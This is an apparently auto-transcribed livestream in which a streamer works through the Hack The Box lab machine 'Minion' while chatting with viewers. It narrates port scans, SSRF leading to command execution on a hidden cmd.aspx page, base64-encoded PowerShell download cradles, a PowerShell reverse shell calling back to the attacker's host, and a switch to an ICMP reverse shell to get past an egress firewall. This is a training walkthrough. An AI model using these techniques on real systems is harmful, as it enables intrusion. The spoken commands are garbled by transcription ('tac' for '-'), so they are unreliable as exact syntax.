the main screen. Close up Blocky. Add subnode. Node name is going to be Minion. Add subnode. Interesting. Okay. Okay. What is the IP? 10.10.10.57. Okay. Okay. Okay, Nmap scan is running. By the way, so the top 1,000 scanned ports didn't come up with anything. So we're waiting on the full port scan. Frankenstein0602 with the 3-month resubscription. Thank you so much. Hey, y'all, what are we hacking? We're hacking. We just started Minion on HacktheBox. Supposedly a very hard box. Your eye contact made it sexual? Look, I always got to make eye contact with chat. I got to display dominance. Okay? I'm even going to T-pose on chat. I'm T-posing on chat. We're gonna hack while T-posed. That's it. We're gonna hack like this. I'm T-posing, like I'm displaying dominance. A documented self-admitted history with Gabe for pay did not happen, okay? That is a corruption of the facts. That is a perversion of the facts at absolute best. At absolute best, that is a gross perversion of the facts, facts, sir. A damnable lie, you might say. Minion was always one of the tougher bosses in Twisted Metal. Yeah, now they're obnoxious Facebook boomer memes. That's what minions are used for. Those stupid yellow pill looking guys from Despicable Me. Like now they're all boomer, really shitty boomer memes on Facebook. Do you always have to sudo an nmap command? Yes, it's ideally like TCP nmap scans will run, but sometimes you'll have a problem with the ping because pings require root privileges. UDP scans won't run at all. OS detection scans won't run at all. You should just always sudo your nmap scans. It's just a good idea. Just nmap uses a ping to detect if the box is up before it even to detect if the box is even up before it tries to scan it. It doesn't scan all the ports on every box. So you do need to. So in order to have ping needs to be one with root privileges. And I know you're saying, but Mr. Streamer, I never have to sudo ping. Like if I come over here and I go ping 10.10.10.57, it's not running as root. What? Why can ping what? I'm gonna show you why. ls tech la user bin ping. Okay, well I don't know why it doesn't say it here. Tac perm tac 4000 to the answer is because ping is an SUID. Ping is an SUID file. I don't know why it's not showing as SUID here. That's weird. Maybe this is a different ping. Don't you need to put TAC-PN if it's a Windows box? A lot of Windows boxes won't respond to pings. TAC-PN is to ignore the ping scan and just to scan the host, to treat the host as up and just not to ping at all. That's what TAC-PN does. So sometimes Windows boxes will not respond to pings. That's just a feature of Windows boxes. I guess you could say. So I actually don't see ping here. That's strange. Ping is usually SUID. Maybe this binary does something different. I'm not really sure. Ping on most machines is going to be, on most Linux machines, my understanding of ping was that it was always going to be SUID. SUID would mean it always runs as root because the file is owned by root. So ping must be run as the root user because it opens raw IP sockets, so it has the set UID bit set. Like, it's not showing as SUID here. Like, if I just take umount, for instance. See, this is highlighted in red, and it has the S there for the SUID bit. So this is an SUID file, and it's highlighted red to show it. So why? Huh. This is actually recent, like just in the last year. Creating ICMP packets does not require root permissions. Huh. Okay, I didn't know this. I was trying to show you that ping was, but for Nmap it does require root permissions. So sometimes if you do Nmap and do not, if you're doing an Nmap scan, you don't sudo it. Sometimes the ping will fail. Like sometimes it will, sometimes it won't. Hard to say. You should just get in the habit of sudoing Nmap. It's just a better idea. I feel like I really contributed today. Well, that's good. That's good, the Dude 31. It's good you feel like that. It's good. Is fucking up the NTFS table also a feature? I guess so. I guess so. Well, this is taking fucking forever. So I can't do anything until I know a port that's open. Maybe I should start a UDP scan. Maybe this is one of those weird boxes that doesn't even have a TCP port open. It's all a UDP box. So we can nmap tech su. Oh, I have to sudo nmap. Nmap tech su. Tech on UDP. 10.10.10.57. So we'll start a UDP scan just in case. And we'll do a Stream Raiders battle while we wait. 18. Okay. 18% done, my ass. Okay, hang on a second. We gotta cut this thing down. So I just need to find out what ports are open. So we're gonna add the TAC V to tell me when a port's open. As soon as it finds it. And we're gonna add a TAC T5 to help it go as fast as possible. TAC T5 typically makes your scan a little bit unreliable, but I haven't had that much of a problem with it. So make it go a little bit quicker, and we'll get immediate feedback when a port is found. TAC V enables verbose output. Okay, this is gonna take fucking forever. Who chose this box? Where this is just gonna take fucking forever. Nope. Nope. Still don't have it. Are we malding again? I'm still out of Cthulhu flags. Well, someone else is going to have to help you with that. What did you think of Blue Yeti mics? I considered them for my microphone. This is not a Blue Yeti mic. This is a Shure S17B. I did a lot of research on the types of mics that were best because, like, considering that there's multiple kinds of sound, right? There are some, like, Twitch streamers or content creators that are playing musical instruments or are singing or something like that, and they are best to have it's best for them to have, there are different microphones for those people than there are for people who are just planning to talk into a microphone in a normal human tonal range. So I had to learn about the different kinds of microphones that are available, and then I had to educate myself on which kind I should get, and then I landed on this mic. This is the mic that's used on the Joe Rogan Experience. I've seen a number of different Twitch streamers using this exact same mic. It's a very popular mic. And it seems to be working pretty well. I haven't heard any negative feedback about the mic so far. So, condenser microphones. This one is a dynamic microphone. A Blue Yeti is a condenser microphone, if I remember correctly. The condenser microphones are typically more for the musical instrument stuff. They're typically, you want to capture as much clarity of all the different ranges of tones that could hit the mic as possible. But if you're just talking into a mic, then that's not necessarily necessary. What I wanted is a mic that was going to isolate my voice as much as possible, so you wouldn't hear the whine of my computer fans, you wouldn't hear my keyboard, you wouldn't hear anything ideally except for my voice happening in this room. It would isolate my voice as much as possible. 1 hour remaining. God, no, it's 4.25% done. Okay, well, I didn't pick this box, okay? I didn't pick this box. It's going as fast as possible. I guess we can try mass scan, huh? I guess mass scan is quicker. So I guess we can let this continue going. I'm afraid to stop it now, but mass scan. Attack H, because I can't remember. Attack P. Is there an interface option? I can't remember how to use that fucking mass scan. Help. I don't think there's an interface option. For some reason, I want to feel like there's an interface option. I guess not. I could be wrong. Okay, mass scan. It's going to be TAC P 0 to 65,535. And then just 10, 10, 10, 57. Need to run a sudo root or something. So we will... I could have just sudo bang banged. Let's see if that goes any quicker. Mass scan is typically very, very fast. Rust scan might be, you could complete a whole different box. I could have just scanned this box and then done the easy box, and by the time I was done with the easy box, maybe this scan would be a half of the way done. Can we get a prediction going so we can gamble our Cthulhu fight? What predict? I've thought about that. I watch Hearthstone streamers and they do predictions, like they let people gamble on their games. I've thought about, like, how can I leverage that in my own stream, and I honestly don't know. Like, what we could gamble with. What could we gamble with? Maybe we could gamble on starting Stream Raiders battles early or something. And whether or not we can continue. Do something fun like, hey, you're a comedian, right? Do something funny. Say something funny. I'll do a quick, well, since, we'll do a repeat last card on the fit deck. Since I don't know if I missed any other fit decks, and I can't trust chat, we'll do a third fit deck while we're waiting. Is this standby animation new? It is. It's brand new. It's first stream we're using it. First stream we're using it. One night he was blasting... Oh, are you talking about the upstairs neighbor? When is Al gonna collab with him? Never. He's like a manlet too. He's like 5'3". He's like, I went up there one time because he was doing it in the middle of the fucking night, and I was like literally like 1:30 in the morning, I went up there and I was like, dude, can you just fucking keep it down? I didn't say fucking. I did not say fucking. I was cordial, okay, chat? I was cordial. But I do appreciate the new GFX. Thank you, Titanium. I'm glad that you like them. I put some time into figuring them out. Looking cool. I feel like I'm premium. Yeah, no, I feel like we're a real Twitch streamer now, chat. ZIP port, the last few ports? What do you mean the last few ports? Like 65, 535, 65, 534? Like, really? Well, if you happen... Okay, wait. Mass scan is done. Found 0 ports. God, what is happening? Like, what port is open? No ports found. Mass scan found no ports. Okay. All right. I'm not looking at the walkthrough because chat will accuse me of cheating. Someone look up the walkthrough and tell me what port is open. Someone look up the walk. I'm serious. Get in the 62.6. Okay, that's okay, 62.696, is that it? Okay, we'll try that. I'm not scanning the box again. Someone go into the fucking thing and tell me what port is open. I know there's got to be a port open because this is not a box unless there's a goddamn service listening. Why didn't mass scan find it? No, it says it's down. Oh, tac p. I have to sudo it. See, this is because I didn't sudo, the ping failed. You have to sudo it. Okay, so thank you, chat. Thank you. Chat is useful for once. Chat is useful for once, okay? Thank you. Thank you, chat. We have figured out is there any other port open that I should know about? Because these scans are taking forever. Is this the only port? Is there any port open that I need to worry about? Is 443 open? .443 is filtered. Okay, what service is running here? Jesus. Okay, attack SV. Again, normally I wouldn't do this. It doesn't make for very compelling Twitch streaming, though, if I'm just scanning and waiting for Nmap to finish, okay? If I'm just scanning, it doesn't make for a compelling Twitch stream, so I'm just asking you guys to give me a little bit of help for once. Let's see what service is running here. Oh, for fuck's sake. It's just IIS. So okay, real quick. Fucking chat, look at me, chat. Look at me. If you make a HacktheBox machine, and then you're gonna make some fucking service run on some weird-ass goddamn port for no reason, and just have IIS run on some weird-ass fucking port for no reason at all, fuck you, okay? You're dead to me, okay? Just waste all of my time just scanning every single port. Jesus. Fuck. Okay, here we go. Just, like, everyone knows how to do a full port scan, okay? You're not teaching anyone anything by having having your web service running on a weird, obscure port, okay? Oh, Hazred, what happened? We just couldn't, we started doing Minion on HacktheBox, and no scans were turning up any ports that were open. We couldn't find any ports open. So I ran a mass scan. Look, I even ran mass scan of the box, of the entire box. It didn't find a port open. This is why I don't use mass scan a whole lot. I find it's unreliable. It's faster than Nmap, but unreliable. Nmap wasn't finding anything open, and I finally just said, hey, chat, go into the fucking, find a write-up and tell me what ports are open. Because I'm tired of this shit. So let's start GoBuster again. We've already wasted so much time. Let's just start GoBuster. Sudo GoBuster dir tech u. It doesn't have to be sudoed, actually. We don't have to sudo GoBuster. Like that. 10.10.10.57. Since it is a Windows box, we'll assume ASPX. And we'll fire it off. And let's take a look at it. What port is it? Oh, right. I have to put the port. 62,696. Doke. See what we get there. Let's browse there. Minions fan club site. Okay, well, I'm already nauseous because I hate Minions. Minions fucking suck. Designed and maintained by Decoder, Chow from Italy. So we're going to take note of Decoder. That could be a user, I suppose. In fact, we'll just copy this whole thing. When you're looking at CTFs, it's good to take note of anything that the box creator had to put on the box. Take note of anything that is not default. And how non-default web pages, non-default. I see a /backend, which is interesting. Let's take a look at the page source. Oh, we're seeing there's a base 64 string here. So this has to be Italian, right? I'm assuming this is Italian because Decoder said he was Italian. Right? Because it says Chow from Italy. So this looks like it's probably Italian. So we can go to translate.google.com. Hey, shut up with the shut up. Paste. Italian. In the middle of the journey of our life, I found myself in a dark forest, for the right way was lost. Okay. Is there anything here? This has got to be something, right? This has to be something. I found myself in a dark forest. Maybe we want to, like, assume, like, directory names? Maybe these are directory or file names? Did GoBuster find anything? The /backend. Let's look at the /backend before we get ahead of ourselves and start guessing. Instance not running. View page source. Okay. What a Poggers site. Oh yeah, Super Poggers. When I think of Minions, I think of the game Overlord. I think of boomers and Facebook, yeah. Boomers love Minions. Boomers love Minions. I could have translated that for you. It's Dante's Inferno? Okay. Is it? I read Dante's Inferno way back in high school. I don't remember that passage. But I believe you. I believe you. So maybe they're just poking fun that Minions are shitty. Maybe we can take a look at this image. Let's wget the image. Wget. The reason I'm wgetting it and not saving it from Firefox is it'll preserve the metadata on the file if I wget it and like the file creation dates. So if I do this and I do exif tool, Minion, and we can see file modification date and time is created in 2017. I don't see any. I don't see anything there, so we can try steg hide, extract, tac-sf. Thank God for ZSH. I love ZSH now. Friendship ended with Bash. Now ZSH is my best friend. I love how it remembers my commands. Enter passphrase, nothing. Could not extract any data. Extract Dante. We can try a few passphrases. Inferno. Nope. I mean, steganography is kind of a long shot. It's just there's not a whole lot for me to look at here, so I'm just kind of looking at stuff and seeing if anything shakes loose. We have a phrase from Dante's Inferno here. This has steganography. I agree, man. They're showing us a big image with like a passage from Dante's Inferno here. Huh. Oh no, that is the beginning of Dante's Inferno, isn't it? How could I forget that? How could I have forgotten that? That is the beginning of Dante's Inferno. Like, what am I fucking think? I need to reread Dante's Inferno. It's been too long. In the middle of the journey of our life, I found myself in a dark forest, for the right way was lost. Yeah, strings on minion.jpg is a good idea. Strings, minion.jpg. Nothing. Looks like it's just a regular image. We could try binwalk. But keep in mind, this is supposed to be a hard box, so we could struggle for a little bit. But it does just say JPEG image data, and unless we can crack some kind of steganography password, it's clear we're not getting any HTML files. Let's try ASP, ASPX, TXT. Let's try a whole bunch of them. TXT. What are some other files there might be? XML. We'll try that as well. All right, let's try that. Go back here. Does the word list include words in other languages? What word list? I'm assuming so. Like, directory list 2.3 medium is very, very long. I'm seeing a CVE about ASP files. ASP files. I mean, ASPX is the more modern version. I have contributed a lot today. You have. You have contributed. You mean everyone contributes a lot every day. I do love my chat, despite our spats. Our occasional... Alright, changed it back. Oh, jeez. It wasn't an error. He was reading the write-up, and now he's root. God, I wish I was. No, I don't. I don't want to cheat. No cheating allowed. Okay, so let's review. What did I do off stream? So, this says missing parameter U in URL in get request. So, clearly, so we set our scope. I set my scope. I sent a request to get request to test.asp. I sent it to repeater. And this is where we are. I added a URL. I tried adding my own IP address first. I have a web server listening here. Uh, 10.10.14.21. And this gives internal server error. Is the pull-up cat new? She is. Or he, she. Scrubterfuge, nice Jack Skellington poster. Yeah, it's my favorite movie. We saw everything in the reflection of your glasses. My yellow glasses. And he talked during the transition. I did not. I did not. You lie. So anyway, I couldn't reach out to my own box. So I tried just localhost. And I sent this. And I get site administration. And we can see what this looks like. We can copy this. And we can go in over here. Paste this in right here. And we can go. And we're seeing system commands at cmd.aspx. Okay, so we have to... It's giving us a link, though. So /cmd.aspx. So we send it. Enter your shell command. So really, it's just gonna be that easy? We're just gonna do that, huh? This is supposed to be a hard box. I'm not feeling the pain. Calling you out, box. Just saying. Why is that? Oh, 1, 2, I copied this. Make it hurt, Hacker Daddy. I'm doing my best, man. I'm doing my best. This box is not really putting me through my paces right now, but I'm probably... Well, now it's not even loading. I don't have intercept on, do I? Nope. The insane part was the nmap scan? Yeah. It's so hard to nmap scan. Why is this taking forever? I mean, it came back immediately when we did this. Like, can we just do CMD? Can we guess the parameter? Like, CMD equals, who am I? Send? Okay, what is it? Okay, it's a post. So it wants a post request. Okay. So it wants a post request. So we can change this to post. I mean, what parameter is it? Name XCMD. So it's XCMD it wants. Will it work in a GET request? Because I don't think I can send a post. Okay, it gave me an OK. I can't send it in a post because there's GET. Can I? We change request. We can try it, I guess. I'm still getting a... Oh, I'm an idiot. Wait a minute. What am I doing? Change request back. We need to do cmd.aspx and then xcmd equals who am I? Nope. We get a 200 OK. Yeah, parameter xcmd, yeah. Put the fort in fire. I mean, I don't know if it's... The thing is, I don't know if it's executing the command or not. Because it is not... It may be executing the command and not showing me the output. So I need to do TCP dump to know for sure. So sudo TCP dump tech iton 0. So we can try to ping ourselves. So we can ping 10, 10, 10, or 10, 10, 14, 21. Thusly. And we have to control U to URL encode that. Okay. And we do get ping. Look, look, look. Look. We have code execution. Code execution. We have it. We have code execution, so we are getting pings. Fantastic. So now we just need to do a Nishang shell, I guess. We can just do Nishang. We have confirmed code execution. So copy. I did this last time. We'll call it Cthulhu.ps1. Vim Cthulhu.ps1. Now again, as I said last time, this is a PowerShell script. So this is a PowerShell module. So when you run this script, all it's going to do is give you access to this commandlet. All it's going to do is load this commandlet into PowerShell's runtime. So then you have to actually execute the commandlet to get it to work. So we can yank it. We go down to the bottom. We put it. And we want to set the IP address. 10.10.14.21. Port 8443. Okay. And now we can, we want two panes open. We want to sudo python3 tacm http.server. Down here we want sudo netcat. It just needs to be netcat. TechNLVP. Okay. So now we can put a command in here. We can put IEX IWR for invoke web request 10 http:// Oh, I have to be PowerShell.exe, don't I? PowerShell.exe. Actually, there's an easier way. Let me open my notes. I have notes for this. Let's see. Useful commands. Okay. There it is. So now we can echo tac n. And now we want to type our one-liner in there. So IEX invoke web request http:// 10.10.14.21 Cthulhu.ps1 tac use basic parsing. And we want to pipe that into iConvert. We got to convert that to UTF-16 little endian power base 64, which is what PowerShell wants. ASCII tac t UTF-16 little endian, and then pipe that into base 64. And then tr tac d. I don't think I need to do that, but we can do it anyways. I'm reading this out of my notes. I haven't memorized this whole command. This is what we want. And what this allows us to do is it lets us use PowerShell. It lets us avoid a lot of bad characters that could possibly be in the request. So we can do xcmd equals PowerShell tac enc. And then we just paste this in. That. And we're going to have to URL encode it. Control U. And there we go. So again, PowerShell can use the tac enc parameter to accept a base 64 encoded string. Which is useful in a lot of scenarios, including right now, where we're avoiding bad characters. And we're not getting a request. Exit status 1, it looks like there is an error. Okay, so we can try out a few things. What is endian? There's two kinds of endianness. There's big endian and little endian. In the CPU architecture world, some CPUs prefer to read in memory. They prefer to read the least significant bit of a memory address first. That's called little endian, and some like to read the most significant bit first. That's big endian. So Intel-based architectures are little endian. Do I have to put like the whole path of PowerShell in there, I wonder? PowerShell. Okay, so we got to figure out what we did wrong. So let's try to send a simpler PowerShell command. Maybe IWR didn't work. Maybe it didn't like the IWR, so we can try the ping command again. Ping 10.10.14.21. Try that. We have to try and debug what the issue is. PowerShell tac enc. Paste that in. There we go. Sudo tcpdump tac I ton0 ICMP to listen for pings on my ton0 interface. Send. Okay, we are getting pings. So maybe it just doesn't like the, it could be it just doesn't like the, it doesn't like IWR. We could just try IWR without the invoke without the invoke expression. We didn't even get a hit though, so I'm not sure if this is necessary. I'm just trying to debug what the issue is. So IWR. This is a test. It'll 404, but that's okay. We're just trying to keep it as simple as possible. Trying to debug what our issue is. Okay, copy this. Copy. Head back over here. Paste this in right there. Gotta Control U, send. It could be it just doesn't like IWR. It looks like it doesn't like IWR. So we'll try the old invoke expression. We'll try the old invoke expression. New object net.web client. Okay, so invoke expression. New object net.web client. Wait, it has to be 2 parentheses, doesn't it? It's been a little while. Hang on a second. I haven't typed this one in a while. I can't believe I have to read this off. Yeah, no, I was doing it the right way. Okay. It doesn't need to be in parentheses. It can just be like this. Net.web client. Download string. http://10.10.14.21. If this doesn't work, try cert-util. Yeah, we can try that as well. I'm assuming that PowerShell is on this machine. I could be wrong about that. It was IIS 8.5, so it seems like it should have PowerShell. 10.10.14.21 Cthulhu.ps1. Okay. Take this. The thing is, we want to keep this like the length. We're gonna nudge up against the length maximum here pretty soon. Get requests only have a certain size that they can be. Let's Control U just in case. Head back over here, see if we get a hit. Send. We're still not getting a hit. Did I put the right IP address in? I feel like I always have to check that first. 10.10.14.21. It is executing. It does definitely have PowerShell because PowerShell executed the ping. .10.10.14.21. Yeah. I'm not even getting a hit. .10.10.14.21 Cthulhu.ps1. Antivirus wouldn't be catching it. We would at least get a hit if antivirus was catching it. It would still execute the line, but it would stop. It would still execute the line. Something is wrong with our payload. Maybe I just try it without the base 64. Maybe I can just try it this way. PowerShell taxi invoke web request tac URI http://10.10.14.21. And we can URL encode that and see if we get a hit on our web server. Maybe I'm just overthinking it with the base 64. Really? Huh. Not allowed connections externally? That's, I mean, how is that? I mean, how do we connect to it then? There's nothing else open. There's no SMB or anything. This has to be a reverse shell situation. It has to be. What did I just do? God damn it. Like that. Try and base 64 encode it. Maybe I'm not being aggressive enough in the base 64 encoding. Let's just try base 64 encoding every character, or URL encoding every character, I guess. Convert selection, URL, can code all characters. And we're still not getting a hit. We are still not getting a hit. Did you try looking at that ASPX page? Yeah, that's what we're doing. We have code execution. I just need to get a reverse shell. Like, the only thing I can think of is, are web requests just being blocked entirely at the firewall? Like, is it not allowed to make web requests out? Because if so, that's still a circumventable problem. I have a reverse shell. I don't know if it'll fit, though. I don't know if it'll fit in the... I have a reverse shell one-liner in PowerShell. That's this. So we can try that. It's possible that all web requests are being blocked out from that. Actually, that would make a lot of sense. So... Maybe not. Yeah, psych, I think you were right. That would make a lot of sense because remember, we got an internal server error when we tried to contact our own server with the URL, right? So it could be that it is actually not allowing us to do... Yeah, so it actually could be that we're not allowed to make connections out. That actually... Okay. Okay, so vim PowerShell rev.txt set paste. So here's our, this is the PowerShell reverse shell. This is a one-liner for PowerShell reverse shells. I don't use it very often, but my guess is it's useful here. All right, let's do a Stream Raiders battle because it's time. So what we could try is and that it would make a lot. It seems like it's trying, like the web page hangs for a little bit, like it's trying to make a web request and it's failing. So let's try 18110. This is a test. So we're gonna put the web server on port 18110 and see if it hits us. Okay, now let's see if we can hit it, or if it hits us. We have to put tac enc again. Paste this in. URL encode all of that. Send. Yeah, see, it's hanging like it's trying to reach us, and it looks like it's failing. It looks like all web requests are just being blocked at the firewall, I guess. That's all I can come up with. Because it looks like it's executing to me. So, okay. So we're going to do this PowerShell reverse shell instead. So we can do... Let me copy out this iConversion line. Paste that in. So there's our PowerShell. I hope that's not too big. I hope that's not too big. Get requests can only be so long. So I'm not really sure if that's going to fit, but I'm hoping it is. Paste that in there. Oh, what am I doing? What even am I doing? I didn't even change, like, the... I have to change the 10, 10, 14, 21, 8443. That's all good. Exit out. Get that. Copy it. Head in here. Paste this in. Hopefully it's not too long. If it is, I guess we're going to have to figure out how to do a post request with a get, with the server-side request forgery. And now we're listening on 8443. Send. Don't get anything. Please go away. It looks like it's trying to do something and failing. Huh. This PowerShell actually does run on Kali, if you didn't know that. PowerShell does run on Kali. It's installed by default in the on some versions of it. Llama Llama 17, what's the purpose of the game? You mean Stream Raiders? Stream Raiders is just you put units down and we fight. That's it. That's all it is. Pretty straightforward. So let's try, I guess, pasting in... Okay, we did get a connection, so my reverse shell works. My reverse shell works. Hmm. So, I don't know where we're going wrong. Because we were able to encode a ping payload, couldn't we? Ping worked. So I know we're not hitting any bad characters. The bad characters must be fine. Maybe there's a size limit. I could be hitting that size limit we talked about. 2048 characters. Let's see how many characters this is. $13.49. But there's still all the rest of this stuff, so we must be hitting the size limit. That's all I can come up with. Fuck. Okay, so we could write a PowerShell script to disk and then execute it. It's a pain in the ass, but I think what I'll do is I'll write a PowerShell script to disk and then execute it. Chat is here to help. Yeah. 2 echoes into a file. Titanium, I think, has the right answer. I think I'm going to try to write. I think I'm hitting that length request, that length issue. So I'm going to, let's do vim PowerShell rev.txt. And we're going to hit those bad characters again, aren't we? I think we're going to hit some bad characters. The size limit is for the URL only, not for the headers, so the payload is fine. Are you sure? Huh. This code encrypted version? Like, we're not doing an encrypted version, it's encoded. We sent this code encoded, and we didn't get anything. I'm listening on the correct port, aren't I? Yeah, no, I just executed the payload. I just executed it. Guaranteed it's executing on the correct line. The thing is, I have to deal with from base64 string and to base64 string and all of these things. I'm just thinking about what the best way to do this is. What is UTP and TCP try an ICMP reverse shell? That could be it. Because we were able to ping out, but we haven't been able to get anything else to work, have we? PowerShell ICMP reverse shell. Let's see what we get. Oh, Nishang has one, which can be used for reverse interactive. This is too long, though. This is too long. We're either going to have to write this to disk. One-liner. Try the same port as the server is running on. I mean, I don't think that's it. We're not able to get any. I don't see outgoing ports are allowed on are being blocked just in general. I think both TCP and UDP are being blocked. I thought it might just be port 80, but I can't get anything except for a ping to work. Like, so it could be we have to do some kind of ICMP reverse shell here. Very interesting. So we might have to just write to we might just have to write to disk. I think we're just going to write a file to disk. So how do we use this Nishang reverse shell? ICMP-based underscore m.py. And then it wants us to run. Do we have that? Is it in Nishang? CD client. CD shells. Do we have this? So we need a handler for ICMP reverse shells. You can tunnel through ICMP for reverse shells. It is possible. But apparently I don't have this, whatever this file is that they want me to use, that Nishang wants me to use. I've never had to do this before, chat. I'm aware that it's possible, but I've never had to do this before. Very interesting. So we're going to search for this. This guy, looks like. ICMP command shell. Most restrictive web rules are 443 and 53. Yeah, that's why I normally have tunnel back on 443 and 53. But we can't even get web requests out. Like, literally no request on any port has been going out so far. So I think, and someone in the chat suggested that someone in the chat suggested that, hey, maybe we just have maybe just all TCP and UDP are being blocked. So we're going to have to use ICMP because we can ping ourselves. We are able to ping ourselves. So I know I can reach myself with a ping. The question is, it looks like this is what we want, by the way. So we'll hop over here. So we're going to have to, we're facing a length limit, right? So I'm going to have to base 64 encode the Nishang reverse shell. This guy right here. Where is this located? Shells, invoke PowerShell ICMP. Here it is. That guy. So CD, what is it? Minion? RM, tac R, let's just RM Cthulhu.ps1. And RM PowerShell reversed, because those are not doing us any good. So we'll copy, user share. ICMP. Is this Skyrim music? Did we land on... Is this Skyrim? This is definitely Skyrim, 1000%. What about download and execute at the same time? It's doing that. The problem is, like, the code is executing just like that. The code is executing, I promise you. The problem is that the web requests out, like the requests for the reverse shell, like not just any request out, like to establish a reverse shell or anything, is not working. Like it's being blocked at the firewall, I think. Oh, it's quite low. I'll turn it up a little bit so you guys can hear it. There you go. It's good music going on right now. It's a Skyrim music. Cthulhu.ps1. Yeah, okay. So Vim. So I want to reduce the size of this. So it'll be easier if I just do it this way. Leaf pad. Do I have leaf pad? No, I have mouse pad though. Mouse pad. Cthulhu.ps1. Let's make it smaller so I can see what I'm dealing with here. We can remove all the comments. Again, we're dealing with a length limit here. So okay, that's probably fine. Whatever. Okay, so this is definitely too long for our length request, so we're going to have to break this up. All right, I need to remind myself how to convert from base 64. So we want to use base 64. It's system text encoding. This looks right. UTF-8 or ASCII. We want it to be UTF-16. There needs to be a native commandlet for base 64. This is fucking ridiculous how hard it is to base 64 decode in PowerShell. Okay, let's try this. So we want to... Man, this is going to be a fucking mess. Just FYI, this is going to be a fucking mess, chat. All right, so... Ooh, boy. Okay, let's just take this portion here. Oh, this is Breath of the Wild. I know this is Breath of the Wild. Legend of Zelda Breath of the Wild. Said all profiles stayed off. Yeah, I'd love to do that, but I guarantee you, like, the web server is not running as admin. This is supposed to be a very hard box. So we're trying to figure out how to tunnel. It's just going to be... Like, is there like a... Fuck. Is there one that is shorter than this? Is there anything that's shorter than this? All I'm seeing is Nishang. I guess we'll try and sending it in 3 parts. So we'll send... mousepad part 1 .txt. What? Okay. Are you kidding me? Okay. Okay. Why not encode the full thing, then split the encoded string? The problem is I'm going to have to decode them in different parts. And if they decode and each of the different parts are not valid base 64, they're not going to, it's not going to decode properly. Mousepad isn't on KDE. It is right now. I have KDE. cat part1.txt. Pipe that into iConvert. Paste that in. We don't want this. Okay. Now we're going to go over to our PowerShell, our test PowerShell prompt. We can turn this off. Did I close PowerShell? I thought I still had PowerShell open. Okay, and now we want to make sure that we decode it properly. Coding. Test.html. Or we'll just do test.txt. So $data. It's going to throw an error here. That's okay. Well, we don't have $data set, so we need to set $data. So let's take this. $data is equal to this string. Thusly. Okay, that seems to work. So we can send this in multiple parts. So we are going to need to base64 encode this as well. Well, so we need to... Okay, so let's open up... let's pull this over here. And let's do... Minion. We're going to take this. Paste that in. And now we just need to replace $data with something that matters. So $data needs to be replaced with this. And hopefully this doesn't bust the length limit. Paste. So let's make sure that this still works. I'm checking and double checking this. I don't want to redo this. Really don't want to have to redo this. Well, we figured out why mousepad wasn't opening. Let's go back to PowerShell. Let's paste this in. Do test1.txt. Did I delete a parentheses somewhere? Oh, maybe I forgot the. Maybe I need to put a string in there. It needs to be there needs to be that. I just got to make sure that this writes to a file as it should. Cat test1.txt. Okay, that does. Okay, so we will. We're gonna put this into Cthulhu.ps1. Okay, so this gets copied. We come back over here. Echo tac n. Okay, that works. Echo tac n. And then I need to pipe that into the base 64 line. God, this is a pain in the ass. Holy cow. Just FYI, chat, this is an enormous pain in the ass. Like, I'm pretty sure I know what needs to be done. It's just a pain in the ass to actually do it. Holy cow. You're doing a really good job. I appreciate that, the dude. I appreciate that. Hello, what is up? Hey, JTGY. Good to see you. Good to see you. Let's do a Stream Raiders battle really quick. We've got 1 minute left on that son of a bitch. Okay, hopefully this is not too long. I'm hoping to God it's not. Ooh, God. I don't know, dude. It might be too long. Let's run it again and pipe it into WC-C. It's too long. Fuck me, dude. Oh my God, this is going to be an enormous pain in the ass. Holy shit. Clap your hands if you believe. It's too long. The problem is, okay, so... it's definitely maybe it's Tarf and Doc Phipps. Thank you for the follow, my friends. Cthulhu Fatagan to you. Let's head on over to Stream Raiders. All right, here we are. So the first thing I'm gonna have to do is try to cut down on the length of the this script as much as possible. So I don't want to do this in Vim. Let's do it in Mousepad. I already had it open in Mousepad, anyways. Okay, here we are. So we want to cut down on the length of this as much as humanly possible. So we can kill this comment. So I'm just removing all the extra lines here, removing the comments. Okay. I guess we'll roll with that. See what that gets us. Save. Now let's head back over to PowerShell. And... oh yeah, I named it Cthulhu.ps1. Okay, so we want to try... I want to try and get a reverse shell. Let me try and get a reverse shell from my PowerShell prompt here before I start to upload this to the machine to make sure I understand how it works and all this good stuff. So we want this. So sometimes network administrators make the penetration testers' life harder. Some of them use firewalls. Yep. That seems to be what is happening here. We can't get any request out except for pings. So this seems to be what we need to do. So... God, I hope it's what we... I hope to God this is what we actually need to do, and I'm not just missing something critical. I don't think I am. I think we've tried just a lot of stuff. Chat always picks the hardest boxes. I say that knowing I wanted to do a hard box. You know, this is really my fault. I brought this upon ourselves. No, you are making sense, Psych. You are definitely making sense. It's probably going to be... The problem is that it wants UTF... It wants UTF-C little 16 little endian base 64, and I don't know what kind Python uses. It would definitely be easier to write a script to do this. And I might do that. Let's just make sure that the shell itself works right now. ICMP-based. And let's head over here to Nishang, and it's saying invoke PowerShell ICMP, and then it wants us to execute this first. So it's going to ignore echo requests. Okay. And then Python. And what is the format of this command? Oh, disable echo replies, I mean. So what is Nishang? Hopefully this is the right, God, I hope this is the right fucking, thing. So we Python source IP address and destination IP address. So that is the source, like, is the source Minion? 10, 10, 10, 57. And then 10, 10, 14, 21. Like that? I have Python Impact. I have Python 2 Impacket. I don't suppose this is just going to work with Python 3, is it? Fuck. God damn it. Come on, dude. Fucking Python 2. Oh my god, can I really not reach pip anymore? Oh, for fuck's sake. What a disaster. Vim. What a fucking disaster. Are you kidding me? Why do I need... Why it doesn't import Impacket? From Impacket, import Impacket decoder. Yep. There's no Impacket. I need Python 2's Impacket, apparently. Oh my god, fucking Python 2 is going to be around until, I swear to god, I am going to be ancient. I'm going to be a decrepit 115-year-old man, and Python 2 is still going to be a disaster to fuck a destroyer of worlds every time, because it never goes away. I mean, Python pip, I think, is going to be Python 3's pip. Only available from a... Fuck. I could try and convert this to Python 3, I guess. Don't code in Python 2. If you're coding in Python 2, fuck off. I honestly, if you, in no uncertain terms, if you're coding modern tools in Python 2, fuck off. Jesus. I guess I could run a Docker container. I have to set up the networking and everything. How about C++? Any value for a pen tester? Absolutely. Absolutely. C++ is super valuable for a pen tester. Holy shit, dude. Fucking Python 2. Python 2, I swear to God, until the end of time is going to be fucking me in the ass. Like, every single time I need to use a tool, it's fucking Python 2. Yeah, you should go. Learn, like, C++ is good learning. It's good stuff. Alright, Yep. I got Impacket for Python 3. Fucking great. Fucking Python. I swear to God, until the end of time, I'm going to be haunted by Python 2. Well, is there a Python 3 version of this anywhere? There is a Perl version, I'm noticing. There's a C version. Maybe I can use one of those. Is this, but which is... The master is portable across any platform. So maybe I can run Perl. ICMP-based. Perl. We can try this. Man, I haven't used Perl in like a million years. But maybe Perl is our savior. Holy shit, I think Perl is our 